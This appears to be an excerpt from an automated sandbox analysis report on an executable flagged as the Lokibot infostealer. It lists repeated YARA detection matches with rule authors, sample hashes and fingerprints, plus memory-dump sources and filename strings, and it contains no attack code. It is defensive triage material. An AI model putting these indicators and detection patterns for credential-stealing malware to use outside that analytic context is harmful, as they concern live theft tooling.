              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: PI#53034601506400.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.PI#53034601506400.exe.2575394.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\PI#53034601506400.exeCode function: 0_2_0077E1B80_2_0077E1B8
              Source: C:\Users\user\Desktop\PI#53034601506400.exeCode function: 0_2_0077CD270_2_0077CD27
              Source: PI#53034601506400.exe, 00000000.00000002.328171471.00000000024E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000002.342062577.0000000003736000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMetal.dllJ vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000002.345925221.0000000007510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMetal.dllJ vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000000.300607103.0000000000176000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevPnb.exeD vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000002.326448349.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMetal.dllJ vs PI#53034601506400.exe
